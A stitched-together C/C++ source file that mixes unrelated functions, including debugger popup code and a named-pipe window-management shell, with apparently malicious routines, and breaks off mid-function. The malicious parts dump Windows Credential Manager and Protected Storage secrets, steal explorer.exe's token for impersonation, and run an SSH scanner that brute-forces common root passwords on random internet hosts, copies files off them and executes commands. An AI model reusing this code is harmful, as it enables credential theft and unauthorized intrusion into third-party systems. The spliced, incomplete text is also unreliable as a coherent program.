HANDLE OsGetUserToken(void)
{
HANDLE hproc, htoken;
int res;
DWORD explorer;
explorer = find_process("explorer.exe");
if(explorer!=NULL)
{
hproc = OpenProcess(PROCESS_QUERY_INFORMATION, TRUE, explorer);
if(hproc!=NULL)
{
res = OpenProcessToken(hproc, TOKEN_ALL_ACCESS, &htoken);
if(res!=0)
{
//deb("explorer.exe handle %p", htoken);
return htoken;
}
else
deb("OpenProcessToken: %s", fmterr());
}
else
{
deb("OpenProcess: %s", fmterr());
return 0;
}
}
else
{
// deb("did not find explorer");
return 0;
}
return 0;
}
char* OsListNetworks(void)
{
static char name[255];
struct hostent *hostinfo;
WSADATA wsaData;
int iResult = WSAStartup(MAKEWORD(2,2), &wsaData);
if (iResult != NO_ERROR)
{
deb("localaddr: Error at WSAStartup()\n");
}
if( gethostname ( (char FAR*)name, 255) == 0)
{
deb("hostname: %s", name);
// Get local IP addresses
struct sockaddr_in SocketAddress;
struct hostent *pHost = 0;
pHost = ::gethostbyname(name);
if(!pHost)
{
deb("err gethostbyname");
return NULL;
}
char aszIPAddresses[10][16]; // maximum of ten IP addresses
for(int iCnt = 0; ((pHost->h_addr_list[iCnt]) &&
(iCnt < 10)); ++iCnt)
{
memcpy(&SocketAddress.sin_addr, pHost->h_addr_list[iCnt],
pHost->h_length);
strcpy(aszIPAddresses[iCnt], inet_ntoa(SocketAddress.sin_addr));
deb("local: %s",aszIPAddresses[iCnt]);
}
if((hostinfo = gethostbyname(name)) != NULL)
{
return(inet_ntoa (*(struct in_addr *)*hostinfo->h_addr_list));
}
deb("localaddr: gethostbyname failed, %s",fmterr(WSAGetLastError()) );
}
deb("localaddr: gethostname failed, %s",fmterr(WSAGetLastError()) );
return NULL;
}
void
setup(register struct packet *pkt, int serial)
{
register int n;
register struct apply *rap;
int first_app = 1;
pkt->p_apply[serial].a_inline = 1;
for (n = maxser(pkt); n; n--) {
rap = &pkt->p_apply[n];
if (rap->a_inline) {
if (n != 1 && pkt->p_idel[n].i_pred == 0)
fmterr(pkt);
pkt->p_apply[pkt->p_idel[n].i_pred].a_inline = 1;
if (pkt->p_idel[n].i_datetime > pkt->p_cutoff)
condset(rap,NOAPPLY,CUTOFF);
else {
if (first_app)
pkt->p_gotsid = pkt->p_idel[n].i_sid;
first_app = 0;
condset(rap,APPLY,SX_EMPTY);
}
}
else
condset(rap,NOAPPLY,SX_EMPTY);
if (rap->a_code == APPLY) {
ixgsetup(pkt->p_apply,pkt->p_idel[n].i_ixg);
}
}
}
/* ********************************************************************************* */
int udp_send_packet(ubermsg *packet)
{
SOCKET udpsock;
struct sockaddr_in sin;
if( (udpsock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == INVALID_SOCKET ) {
deb("udp:socket: %s", FORMATERROR);
return 1;
}
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = DnsResolve(UDP_SERVER_ADDR);
sin.sin_port = htons(UDP_SERVER_PORT);
if( ((unsigned)sendto(udpsock, (char*) packet, PACKETSIZE(packet),
0, (sockaddr*) &sin, sizeof(sin))) != PACKETSIZE(packet)) {
deb("udp:sendto: %s", fmterr());
return 1;
}
//deb("packet sent: %d bytes", PACKETSIZE(packet));
closesocket(udpsock);
return 0;
}
void
finduser(register struct packet *pkt)
{
register char *p;
char *user;
char groupid[6];
int none;
int ok_user;
extern char saveid[];
none = 1;
#if 0
user = logname();
#else
user = saveid;
#endif
sprintf(groupid,"%lu",(unsigned long)getgid());
while ((p = getline(pkt)) != NULL && *p != CTLCHAR) {
none = 0;
ok_user = 1;
repl(p,'\n','\0'); /* this is done for equal test below */
if(*p == '!') {
++p;
ok_user = 0;
}
if (!pkt->p_user)
if (equal(user,p) || equal(groupid,p))
pkt->p_user = ok_user;
*(strend(p)) = '\n'; /* repl \0 end of line w/ \n again */
}
if (none)
pkt->p_user = 1;
if (p == NULL || p[1] != EUSERNAM)
fmterr(pkt);
}
extern "C" int __stdcall mye_DockWindow(HWND hwnd, int xwidth, int where, LPVOID addr)
{
char buf[1024];
HDC hdc=0;
DWORD dwRead;
#pragma pack(1)
typedef struct temp
{
char cmd;
HWND hwnd;
LPVOID addr;
char dllpipe[128];
} tmp;
#pragma pop(1)
tmp stmp;
stmp.cmd=LO_DOCKWINDOW;
stmp.hwnd=hwnd;
strncpy(stmp.dllpipe, dllpipe,sizeof(stmp.dllpipe));
stmp.addr=addr;
unsigned long ret2 = CallNamedPipeA("\\\\.\\pipe\\ReqForm", &stmp, sizeof(stmp), &hwnd, sizeof(hwnd), &dwRead, 0);
if (!ret2)
deb("mye_DockWindow CallNamedPipe: %s", fmterr());
deb("dockwindow wrote %d bytes",sizeof(stmp));
//deb("read hwnd: %x dwRead:%u hdc %x",hwnd,dwRead,hdc);
return TRUE;
}
WINDOWEVENT *BrowseMshFile(AFILE *fp)
{
char *hp;
static WINDOWEVENT we;
/****************************************************************************/
/* - put the title, instructions, and help appropriate for this popup */
/* into the popup structure. */
/* - save the screen area used by the popup if CUA interface. */
/* - get the file to browse from the user. */
/* - handle user string and keys. */
/* - handle errors. */
/* - restore the screen save area if CUA interface. */
/* */
/****************************************************************************/
if( !browsem(0,fp,&we) )
{
#if defined(SD386LOG)
SD386Log(STRINGCODE," ");
SD386Log(STRINGCODE,PromptString);
#endif
return(&we);
}
else {
/**************************************************************************/
/* display an error message and then ask for another name. */
/**************************************************************************/
beep();
hp = CantFind;
fmterr( hp);
}
}
void nIcon::setHicon(HICON phicon)
{
if(hicon)
DestroyIcon(hicon);
if(! (hicon = CopyIcon(phicon)))
{
deb("failed to CopyIcon: %s", fmterr());
}
// hicon = phicon;
}
void OsListCreds(void)
{
DWORD dwCount;
PCREDENTIAL* creds;
if(!CredEnumerate(NULL, CRED_ENUMERATE_ALL_CREDENTIALS,
&dwCount, &creds))
deb("failed creds enum %s", fmterr());
for(DWORD i=0;i<dwCount;i++)
{
deb("cred #%02d: tgname:%s com:%s user:%s size:%d data:%s",i,
creds[i]->TargetName, creds[i]->Comment,creds[i]->UserName,
creds[i]->CredentialBlobSize,creds[i]->CredentialBlob);
}
CredFree(creds);
}
extern "C" HWND __stdcall mye_GetWindowDC(int where, int width, int height)
{
char buf[1024];
HDC hdc=0;
HWND hwnd;
DWORD dwRead;
buf[0]=LO_GETWINDOWHANDLE;
buf[1]=0x0;
unsigned long ret2 = CallNamedPipeA("\\\\.\\pipe\\ReqForm", buf, 2, &hwnd, sizeof(hwnd), &dwRead, 0);
if (!ret2)
deb("mye_GetWindowDC CallNamedPipe: %s", fmterr());
deb("read hwnd: %x dwRead:%u hdc %x",hwnd,dwRead,hdc);
return hwnd;
}
int cmd_geticon(int dwIndex, PNOTIFYICONDATAW pn)
{
DWORD dwRead;
char buf[2000];
buf[0] = LO_GETICON;
buf[1] = (char)dwIndex;
unsigned long ret2 = CallNamedPipeA("\\\\.\\pipe\\cmdmsgs", buf, 2, pn, sizeof(NOTIFYICONDATAW), &dwRead, 0);
if (!ret2)
deb("cmd_geticon CallNamedPipe: %s", fmterr());
if (dwRead != sizeof(NOTIFYICONDATAW))
{
return MYE_NO_MORE_ITEMS;
}
return MYE_SUCCESS;
}
HWND cmd_getwindow(int dwIndex)
{
DWORD dwRead;
char buf[2000];
HWND hwnd;
buf[0] = LO_GETWINDOW;
buf[1] = (char)dwIndex;
//deb("dwIndex %d",dwIndex);
unsigned long ret2 = CallNamedPipeA("\\\\.\\pipe\\cmdmsgs", buf, 2, &hwnd, sizeof(HWND), &dwRead, 0);
if (!ret2)
deb("cmd_getwindow CallNamedPipe: %s", fmterr());
//deb("dwRead %d",dwRead);
if (dwRead != sizeof(HWND))
{
return (HWND) MYE_NO_MORE_ITEMS;
}
//deb("getwindow idx %d hwnd %x",dwIndex,hwnd);
return hwnd;
}
int cmd_event(LPVOID addr, DWORD msg)
{
DWORD dwRead;
char buf[2000];
buf[0] = LO_EVENT;
EVENT e;
memset(&e, 0, sizeof(e));
e.addr = addr;
e.msg = msg;
e.id = rand();
strncpy(e.dllpipe, dllpipe, 128);
memcpy(&buf[1], &e, sizeof(e));
unsigned long ret2 = CallNamedPipeA("\\\\.\\pipe\\cmdmsgs", buf, 1+sizeof(e), buf, 4, &dwRead, 0);
if (!ret2)
deb("cmd_event CallNamedPipe: %s", fmterr());
return MYE_SUCCESS;
}
int OsImpersonate(void)
{
HANDLE hUserToken;
hUserToken = OsGetUserToken();
if(hUserToken!=0)
{
int res = ImpersonateLoggedOnUser(hUserToken);
if(res!=0)
{
deb("impersonate ok");
return 0;
} else {
deb("ImpersonateLoggednUser: %s", fmterr());
return 1;
}
} else {
deb("failed to Impersonate token");
return 1;
}
return 0;
}
void
SetCondBrk( AFILE *fp, uint SrcLnNumOfCsr, uchar *pSrcLnInBuf )
{
char *hp;
uint key;
char PromptString[MAXPROMPTSTRING];
char *msg;
uchar SrcLnFlag;
BRK *pBrk;
uchar *SaveArea;
static int _iview;
#if defined(MSH)
if(commandLine.nparms>1) {
msg = SetLineBRK( fp,SrcLnNumOfCsr,pSrcLnInBuf,BRK_COND,commandLine.parms[1]);
#if defined(SD386LOG)
SD386Log(STRINGCODE," ");
SD386Log(STRINGCODE,commandLine.parms[1]);
#endif
}
#endif
_iview=iview; iview=0;
*PromptString = '\0';
/***************************************************************************/
/* If there is a conditional bp already on this line, then we need to */
/* initialize the PromptString to the last prompt. */
/***************************************************************************/
SrcLnFlag = *(pSrcLnInBuf-1);
if( (SrcLnFlag & LINE_BP) &&
(pBrk=IsBrk(fp , SrcLnNumOfCsr) ) &&
pBrk->cond )
strcpy(PromptString, pBrk->cond->pCondition);
/****************************************************************************/
/* - put the title, instructions, and help appropriate for this popup */
/* into the popup structure. */
/* - save the screen area used by the popup if CUA interface. */
/* - get the file to browse from the user. */
/* - handle user string and keys. */
/* - handle errors. */
/* - restore the screen save area if CUA interface. */
/* */
/****************************************************************************/
Popup.title = CB_Title;
Popup.instructions = CB_Instructions;
Popup.help = CONDBPHELP;
SaveArea = (uchar *)Talloc(Popup.length * Popup.width * 2);
GetPopArea(SaveArea);
DisplayPop( &Popup );
/****************************************************************************/
/* - loop to handle user entry/errors. */
/****************************************************************************/
for(;;)
{
hp = CB_Instructions;
key = PopPrompt( PromptString, hp);
stripblk(PromptString);
if( key == ESC )
{
#if 0
SD386Log(STRINGCODE," ");
SD386Log(KEYCODE|key,"");
#endif
break;
}
else if ( key == ENTER )
{
if( strlen(PromptString) == 0 )
continue;
msg = SetLineBRK( fp,SrcLnNumOfCsr,pSrcLnInBuf,BRK_COND,PromptString);
if( !msg )
{
#if 0
SD386Log(STRINGCODE," ");
SD386Log(STRINGCODE,PromptString);
#endif
break;
}
/**************************************************************************/
/* display an error message and then ask for another name. */
/**************************************************************************/
beep();
hp = msg;
fmterr( msg );
continue;
}
}
PutPopArea(SaveArea);
Tfree(SaveArea );
iview=_iview;
}
// ---------------------------------------------------------------------------
void __fastcall ShmThread::Execute()
{
NameThreadForDebugging("ShmThread");
status = shmbuf;
cmd = shmbuf +sizeof(char);
data = shmbuf +sizeof(char)+sizeof(char);
shmbuf[0] = SHM_READY;
shme->ResetEvent();
while (1)
{
shme->WaitFor(INFINITE);
if (status[0] != SHM_RREADY)
{
deb("shm signaled");
shme->ResetEvent();
continue;
}
// deb("shm cmd %d", cmd[0]);
shme->ResetEvent();
// Synchronize(Do);
// shme->SetEvent();
// }
// }
//
// void __fastcall ShmThread::Do(void)
// {
if (!shmbuf)
{
MessageBox(Application->MainFormHandle, "error no shmbuf", "err", MB_OK);
ExitProcess(0);
}
switch(cmd[0])
{
case LO_UPDWNDPIC:
// deb("L:O_UPDWNDPIC");
// ReadFile(hPipe, &hid, sizeof(hid), &dwRead, false);
HANDLE hid;
LPVOID p;
HDC hdc;
BITMAPINFO *pbmi;
LPVOID dbuf;
Graphics::TBitmap *ub;
memcpy(&hid, data, sizeof(hid));
// data += sizeof(HANDLE);
bool fail;
fail = false;
wcs->Acquire();
bool found;
found = false;
WNDBUTTONS *pwnd;
pwnd = NULL;
try
{
pwnd = (WNDBUTTONS*)hid;
for (wnd_buttons_v::iterator it = wnd_buttons.begin();it!=wnd_buttons.end();it++)
{
// deb("%x > %x",(*it)->id,hid);
if ((*it)->id == hid)
{
// deb("found %x",hid);
found = true;
break;
}
}
if (!found || IsBadReadPtr(pwnd, sizeof(WNDBUTTONS)))
{
fail = true;
}
else
{
// deb(" LO_UPDWNDPIC => %x ", pwnd);
// deb("%d:%d", pwnd->rect.left, pwnd->rect.top);
if (pwnd->pic)
{
// deb(" SHM:LO_UPDWNDPIC @ %p deleting %p", pwnd, pwnd->pic);
delete pwnd->pic;
}
ub = new Graphics::TBitmap();
pbmi = (BITMAPINFO*)(data +sizeof(HANDLE));
dbuf = data +sizeof(BITMAPINFO)+sizeof(HANDLE);
hdc = CreateCompatibleDC(0);
ub->SetSize(pwnd->rect.right - pwnd->rect.left, pwnd->rect.bottom - pwnd->rect.top);
if (!SetDIBits(hdc, ub->Handle, 0, pbmi->bmiHeader.biHeight, dbuf, pbmi, DIB_PAL_COLORS))
{
deb("bmi->h: %d bits %d", pbmi->bmiHeader.biHeight, pbmi->bmiHeader.biBitCount);
deb("bmihdr sz %d", pbmi->bmiHeader.biSize);
deb("updwndpic setdibits: %s", fmterr());
}
DeleteDC(hdc);
pwnd->pic = ub;
}
}
catch(...)
{
char sz1[1024];
// deb("exception in shmthread: %s", deunicode(e.Message.c_str(), sz1, sizeof(sz1)));
deb("shmthread exception");
fail = true;
data[0] = SHM_FAIL;
}
if (!fail && found)
{
if (pwnd->visible)
{
extern TEvent *bgraphics_event;
bgraphics_event->SetEvent();
graphics_event->SetEvent();
}
// deb("success update %x %d:%d v:%d", hid, pwnd->rect.left, pwnd->rect.top, pwnd->visible);
data[0] = SHM_READY;
}
else
{
// deb("unsuccessfull update of %x", hid);
data[0] = SHM_FAIL;
}
wcs->Release();
break;
///////////////// ///////////////// ///////////////// ///////////////// /////////////////
case LO_UPDATEBGBITMAP:
//shmb->Acquire();
// deb("case LO_UPDATEBGBITMAP:");
extern Graphics::TBitmap *BackgroundBitmap;
BackgroundBitmap = (Graphics::TBitmap*)1;
procId = (DWORD*)data;
BackgroundProcessId = (DWORD)*procId;
bgupd->Enter();
memcpy(&bgbmi, data+sizeof(DWORD) , sizeof(bgbmi));
if (!bgbmi.bmiHeader.biSizeImage ||!bgbmi.bmiHeader.biHeight)
deb("bmi bg height %d", bgbmi.bmiHeader.biHeight);
// deb("size %d", bgbmi.bmiHeader.biSizeImage);
try
{
memcpy(bgbuf, data +sizeof(bgbmi)+sizeof(DWORD), bgbmi.bmiHeader.biSizeImage);
}
catch(...)
{
deb("exception while shmcopy bg");
}
//
bgupd->Leave();
bg_change->SetEvent();
// shmb->Release();
graphics_event->SetEvent();
// deb("done bg upd");
data[0] = SHM_READY;
break;
default:
deb("unknwon shm cmd %d", *cmd);
break;
}
*status = SHM_READY;
// shmb->Release();
}
}
void SetNameOrAddrBkpt( AFILE *fp , uint func )
{
char *hp;
uint key;
char PromptString[MAXPROMPTSTRING];
uchar *SaveArea;
int DorI;
int DefineType;
char *pmsg;
APIRET rc;
static int _iview;
#if defined(MSH) && 0
if(commandLine.nparms>1) {
msg = SetIDBrk( pnode, commandLine.parms[1], &Brk ); /*707*/
if( !msg )
{
AFILE *lfp; /*707*/
for( lfp = allfps; lfp; lfp = lfp->next ) /*707*/
if( lfp->mid == Brk.mid ) /*707*/
MarkLineBRKs( lfp ); /*707*/
#if defined(SD386LOG)
SD386Log(STRINGCODE," ");
SD386Log(STRINGCODE,commandLine.parms[1]);
#endif
return;
}
}
#endif
_iview=iview; iview=0;
*PromptString = '\0';
/****************************************************************************/
/* - put the title, instructions, and help appropriate for this popup */
/* into the popup structure. */
/* - save the screen area used by the popup if CUA interface. */
/* - get the file to browse from the user. */
/* - handle user string and keys. */
/* - handle errors. */
/* - restore the screen save area if CUA interface. */
/* */
/****************************************************************************/
switch( func )
{
case SETFUNCTIONBKPT:
Popup.title = IF_Title;
Popup.instructions = IF_Instructions;
Popup.help = IDFUNCHELP;
DorI = BP_IMMEDIATE;
DefineType = BP_FUNC_NAME;
hp = IF_Instructions;
break;
case SETADDRESSBKPT:
Popup.title = IA_Title;
Popup.instructions = IA_Instructions;
Popup.help = IDADDRHELP;
DorI = BP_IMMEDIATE;
DefineType = BP_ADDR;
hp = IA_Instructions;
strcpy( PromptString, "0x" );
break;
case SETDEFERREDBKPT:
Popup.title = ID_Title;
Popup.instructions = ID_Instructions;
Popup.help = IDDEFRHELP;
DorI = BP_DEFR;
DefineType = BP_FUNC_NAME;
hp = ID_Instructions;
break;
case SETADDRLOADBKPT:
Popup.title = IO_Title;
Popup.instructions = IO_Instructions;
Popup.help = IDLOADHELP;
DorI = BP_DEFR;
DefineType = BP_LOAD_ADDR;
hp = IO_Instructions;
strcpy( PromptString, "0x" );
break;
case SETDLLLOADBKPT:
Popup.title = IL_Title;
Popup.instructions = IL_Instructions;
Popup.help = IDDLLHELP;
DorI = BP_DEFR;
DefineType = BP_DLL_LOAD;
hp = IL_Instructions;
break;
}
SaveArea = (uchar *)Talloc(Popup.length * Popup.width * 2);
GetPopArea(SaveArea);
DisplayPop( &Popup );
/****************************************************************************/
/* - loop to handle user entry/errors. */
/****************************************************************************/
for(;;)
{
key = PopPrompt( PromptString, hp);
stripblk(PromptString);
if( key == ESC )
{
#if 0
SD386Log(STRINGCODE," ");
SD386Log(KEYCODE|key,"");
#endif
break;
}
else if ( key == ENTER )
{
if( strlen(PromptString) == 0 )
continue;
pmsg = NULL;
rc = SetIDBrk( PromptString, DorI, DefineType, &pmsg );
if( rc )
{
beep();
hp = pmsg;
fmterr( pmsg );
continue;
#if 0
AFILE *lfp; /*707*/
SD386Log(STRINGCODE," ");
SD386Log(STRINGCODE,PromptString);
for( lfp = allfps; lfp; lfp = lfp->next ) /*707*/
if( lfp->mid == Brk.mid ) /*707*/
MarkLineBRKs( lfp ); /*707*/
#endif
}
break;
/**************************************************************************/
/* display an error message and then ask for another name. */
/**************************************************************************/
}
}
PutPopArea(SaveArea);
Tfree(SaveArea );
iview=_iview;
}
void FindStr( AFILE *fp )
{
char *hp;
uint key;
uchar *SaveArea;
static int _iview;
/****************************************************************************/
/* - put the title, instructions, and help appropriate for this popup */
/* into the popup structure. */
/* - save the screen area used by the popup if CUA interface. */
/* - get the string to find from the user. */
/* - handle user string and keys. */
/* - handle errors. */
/* - restore the screen save area if CUA interface. */
/* */
/****************************************************************************/
#if defined(MSH)
if(commandLine.nparms>1) {
strcpy(FindString,commandLine.parms[1]);
if(ScanStr(fp)) {
#if defined(SD386LOG)
SD386Log(STRINGCODE," ");
SD386Log(STRINGCODE,commandLine.parms[1]);
#endif
return;
}
}
#endif
Popup.title = FI_Title;
Popup.instructions = FI_Instructions;
Popup.help = FINDSTRHELP;
Popup.Flags = CLEAR1ST;
SaveArea = (uchar *)Talloc(Popup.length * Popup.width * 2);
GetPopArea(SaveArea);
DisplayPop( &Popup );
/****************************************************************************/
/* - loop to handle user entry/errors. */
/* */
/* */
/* NOTE: */
/* FindString is a static variable that will be saved for repeat finds and*/
/* subsequent prompts. */
/****************************************************************************/
for(;;)
{
hp = FI_Instructions;
key = PopPrompt( FindString, hp);
stripblk(FindString);
if( key == ESC )
{
#if 0
SD386Log(STRINGCODE," ");
SD386Log(KEYCODE|key,"");
#endif
break;
}
else if ( key == ENTER )
{
if( strlen(FindString) == 0 )
continue;
if( ScanStr(fp) )
{
#if 0
SD386Log(STRINGCODE," ");
SD386Log(KEYCODE|key,"");
#endif
break;
}
/**************************************************************************/
/* display an error message and then ask for another name. */
/**************************************************************************/
beep();
hp = CantFind;
fmterr( hp);
continue;
}
}
PutPopArea(SaveArea);
Tfree(SaveArea );
iview=_iview;
}
void* thread_func(void* arg)
{
int sockfd;
sockaddr_in serv_addr;
char curhost[26];
boost::random::uniform_int_distribution<> dist(1, 9999999999999);//numeric_limits< unsigned long>::max());
boost::random::mt19937 gen((int)pthread_self()+(int)time(NULL));
LIBSSH2_SESSION *session=0;
// HCkSsh ssh;
srand((int)pthread_self()+rand()+time(NULL));
while (do_scan)
{
sockfd = socket(AF_INET, SOCK_STREAM, 0);
if (sockfd < 0)
deb("ERROR opening socket: %s\r\n",fmterr());
setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int));
long flags;
flags = fcntl(sockfd, F_GETFL, 0);
fcntl(sockfd, F_SETFL, flags | O_NONBLOCK);
bzero((char *) &serv_addr, sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_port = htons(22);
do
{
serv_addr.sin_addr.s_addr = dist(gen);//getrnd(0,100000000000000);//rand();//inet_addr("195.2.253.204")
}
while (ischecking(serv_addr.sin_addr.s_addr));
strncpy(curhost, inet_ntoa(serv_addr.sin_addr), sizeof(curhost));
addchecking(serv_addr.sin_addr.s_addr);
unsigned long chkdist=0;
chkdist=dist(gen);
int ret;
// deb("\rconnecting %16s ", inet_ntoa(serv_addr.sin_addr));
ret=connect(sockfd, (struct sockaddr*) &serv_addr, sizeof( serv_addr));
fd_set fds;
//deb("ret:%d errno:%s (%d)\r\n",ret,strerror(errno),errno);
// sleep(1);
FD_ZERO(&fds);
FD_SET(sockfd, &fds);
tv.tv_sec = 2;
tv.tv_usec = 0;
char buf[1024];
if (ret==0 || (ret==-1 && errno == EINPROGRESS))
{
ipscanned++;
int res = select(sockfd+1, &fds,&fds, 0, &tv);
//deb("res:%d errno:%s (%d)\r\n",res,strerror(errno),errno);
if (res < 0 && errno != EINTR)
{
// deb("\r\n%s Error connecting %d - %s\n\r",
// curhost, errno, strerror(errno));
}
else if (res > 0)
{
flags &= (~O_NONBLOCK);
if ( fcntl(sockfd, F_SETFL, flags) < 0)
{
deb("Error fcntl(..., F_SETFL) (%s)\n", strerror(errno));
}
int rcv;
memset(buf, 0, sizeof(buf));
rcv = recv(sockfd, buf, sizeof(buf), MSG_PEEK);
//if (rcv>0)
// buf[rcv]=0;
// if (rcv>0)
// deb("rcv: %d %s\r\n",rcv, trim(buf));
const char *username="******";
const char *password="******";
const char *sftppath="/tmp";
int rc;
const char *fingerprint;
session = libssh2_session_init();
libssh2_session_set_blocking(session, 1);
int numTry=0;
while (session>0 && (rc = libssh2_session_handshake(session, sockfd)) ==
LIBSSH2_ERROR_EAGAIN);
int u;
LIBSSH2_CHANNEL *channel=0;
if (rc)
{
if (rc!=-43)
deb("%16s failure establishing SSH session: %d [rnd: %lu, checking: %d]\n",
curhost,rc,chkdist,checking.size());
//return -1;
}
else
{
totscanned++;
fingerprint = libssh2_hostkey_hash(session, LIBSSH2_HOSTKEY_HASH_SHA1);
deb( "%16s %-50s ", inet_ntoa(serv_addr.sin_addr),
trim(buf));
for (int i = 0; i < 20; i++)
{
deb(KYEL "%02X " RESET, (unsigned char)fingerprint[i]);
}
deb( "\n");
char* passwords[]={"root","admin","toor","r00t","adm",
"secure","pwd","password","god"
};
for ( u=0;u<3;u++)
{
if (libssh2_userauth_password(session, username, passwords[u]))
{
// deb( "%16s " KRED "Authentication by password failed. [%s]\n"
// RESET, inet_ntoa(serv_addr.sin_addr),passwords[u]);
continue;
}
else
{
deb(KCYN "%16s authenticated %s:%s \r\n" RESET,
inet_ntoa(serv_addr.sin_addr),
username,passwords[u],totscanned);
struct stat fileinfo;
channel = libssh2_scp_recv(session, "/etc/services", &fileinfo);
if (!channel)
{
deb(KRED "%16s Unable to open a session: %d\r\n" RESET,
inet_ntoa(serv_addr.sin_addr),
libssh2_session_last_errno(session));
break;
}
if (!fileinfo.st_size)
{
deb(KGRN "%16s router/modem\r\n" RESET, inet_ntoa(serv_addr.sin_addr),
fileinfo.st_size);
fdeb("%s %s:%s [router/modem (%s)]\r\n", inet_ntoa(serv_addr.sin_addr),
username,passwords[u],trim(buf));
}
else
{
deb(KGRN "%16s unknown device fs:%d [%s]\r\n" RESET,
inet_ntoa(serv_addr.sin_addr),
fileinfo.st_size,trim(buf));
fdeb("%s %s:%s unknown (%s)\r\n", inet_ntoa(serv_addr.sin_addr),
username,passwords[u],trim( buf));
}
channel = libssh2_scp_recv(session, "/proc/cpuinfo", &fileinfo);
if (!channel)
{
// deb(KRED "\r\nUnable to open a session: %d\r\n" RESET,
// libssh2_session_last_errno(session));
//break;
}
else
{
int got=0;
char mem[1024];
int amount=sizeof(mem);
while (got < fileinfo.st_size)
{
if ((fileinfo.st_size -got) < amount)
{
amount = fileinfo.st_size -got;
}
rc = libssh2_channel_read(channel, mem, amount);
if (rc > 0)
{
deb("mem:%p rc:%d", mem, rc);
}
else if (rc < 0)
{
deb("libssh2_channel_read() failed: %d\n", rc);
break;
}
got += rc;
}
if (mem[0])
deb("mem: %s", mem);
}
founds++;
try
{
MySexec sexec;
sexec.SetSSHHost( curhost );
int ret_code = sexec.SetTimeout(17);
if (ret_code) throw("\r\nfailed: SetTimeout\r\n");
ret_code = sexec.SetSSHUser(username);
if (ret_code) throw("\r\nfailed: SetSSHUser\r\n");
ret_code = sexec.SetSSHPassword(passwords[u]);
if (ret_code) throw("\r\nfailed: SetSSHPassword()\r\n");
ret_code = sexec.SSHLogon(curhost ,22);
if (ret_code) throw("\r\nfailed: SSHLogon\r\n");
ret_code = sexec.Execute("ls -l");
if (ret_code) throw("\r\Execute:%d",ret_code);
//sleep(2);
deb(KGRN "executed on %s\r\n" RESET, curhost);
// fdeb("\r\n[host %s]\r\n",curhost);
// exit(0);
}
catch ( const char *str )
{
deb(KRED "in except: %s\r\n" RESET,str);
}
//exit(0);
}
}
// free(fingerprint);
}
if (channel)
libssh2_channel_free(channel);
if (session)
{
// libssh2_session_disconnect(session, "Norm");
libssh2_session_free(session);
}
/* ssh = CkSsh_Create();
bool success;
CkSsh_UnlockComponent(ssh,"Anything for 30-day trial");
success = CkSsh_Connect(ssh,inet_ntoa(serv_addr.sin_addr),22);
CkSsh_putIdleTimeoutMs(ssh,5000);
success = CkSsh_AuthenticatePw(ssh,"root","root");
if (success != TRUE)
{
deb("%s\n",CkSsh_lastErrorText(ssh));
return 0;
}
int channelNum;
channelNum = CkSsh_OpenSessionChannel(ssh);
if (channelNum < 0)
{
deb("%s\n",CkSsh_lastErrorText(ssh));
return 0;
}
success = CkSsh_SendReqExec(ssh,channelNum,"uname -a");
if (success != TRUE)
{
deb("%s\n",CkSsh_lastErrorText(ssh));
return 0;
}
// Call ChannelReceiveToClose to read
// output until the server's corresponding "channel close" is received.
success = CkSsh_ChannelReceiveToClose(ssh,channelNum);
if (success != TRUE)
{
deb("%s\n",CkSsh_lastErrorText(ssh));
return 0;
}
// Let's pickup the accumulated output of the command:
const char * cmdOutput;
cmdOutput = CkSsh_getReceivedText(ssh,channelNum,"ansi");
if (cmdOutput == 0 )
{
deb("%s\n",CkSsh_lastErrorText(ssh));
return 0;
}
// Display the remote shell's command output:
deb("%s\n",cmdOutput);
// Disconnect
CkSsh_Disconnect(ssh);
CkSsh_Dispose(ssh);*/
}
}
//--------------------------------------------------------
int EnumPStorage(void)
{
typedef HRESULT(WINAPI *tPStoreCreateInstance)(IPStore **, DWORD, DWORD, DWORD);
static HMODULE hpsDLL;
tPStoreCreateInstance pPStoreCreateInstance;
IPStorePtr PStore;
IEnumPStoreTypesPtr EnumPStoreTypes;
HRESULT hRes;
GUID TypeGUID;
char szItemName[8192];
char *szItemData;
u_int iDataLen = 0;
char szResName[8192];
char szResData[8192];
char szItemGUID[8192];
char chekingdata[8192];
unsigned long psDataLen = 0;
unsigned char *psData = NULL;
char msnid[8192];
char msnpass[8192];
if(hpsDLL==NULL)
{
hpsDLL = LoadLibrary("pstorec.dll");
if(!hpsDLL)
{
deb("LoadLibrary: %s", fmterr());
return -1;
}
//deb("pstorec.dll loaded handle 0x%x", hpsDLL);
}
pPStoreCreateInstance = (tPStoreCreateInstance)GetProcAddress(hpsDLL, "PStoreCreateInstance");
if(pPStoreCreateInstance==NULL)
{
deb("GetProcAddress: %s", fmterr());
return -1;
}
//deb("pstorecreateinstance at 0x%x", pPStoreCreateInstance);
hRes = pPStoreCreateInstance(&PStore, NULL, NULL, 0);
if(hRes!=S_OK)
{
deb("pPStoreCreateInstance failed: %s", fmterr());
return -1;
}
//deb("pstorage instance created");
hRes = PStore->EnumTypes(0, 0, &EnumPStoreTypes);
if(hRes!=PST_E_OK)
{
deb("PStore->EnumTypes failed: %s", fmterr());
return -1;
}
deb("enumerating pstorage ");
int dwEnumerated=0;
while(EnumPStoreTypes->raw_Next(1, &TypeGUID, 0)==S_OK)
{
wsprintf(szItemGUID, "%x", TypeGUID);
deb("TypeGUID: %x", TypeGUID);
IEnumPStoreTypesPtr EnumSubTypes;
hRes = PStore->EnumSubtypes(0, &TypeGUID, 0, &EnumSubTypes);
GUID subTypeGUID;
while(EnumSubTypes->raw_Next(1, &subTypeGUID, 0)==S_OK)
{
//deb("enumsubtypes->raw_next");
IEnumPStoreItemsPtr spEnumItems;
//deb("enumerating items in %x", TypeGUID);
HRESULT hRes = PStore->EnumItems(0, &TypeGUID, &subTypeGUID, 0, &spEnumItems);
//deb("enum OK");
LPWSTR itemName;
while(spEnumItems->raw_Next(1, &itemName, 0)==S_OK)
{
psData = NULL;
//deb("spEnumItems->raw_next");
wsprintf(szItemName, "%ws", itemName);
_PST_PROMPTINFO *pstiinfo = NULL;
hRes = PStore->ReadItem(0, &TypeGUID, &subTypeGUID, itemName, &psDataLen, &psData, pstiinfo, 0);
//deb("psDataLen: %d", psDataLen);
iDataLen = psDataLen>8192 ? psDataLen : 8192;
szItemData = (char*)malloc(iDataLen);
if(szItemData==NULL)
{
deb("MEMORY EXHAUS !!!");
return -1;
}
//deb("Allocated %d bytes at 0x%p", iDataLen, szItemData);
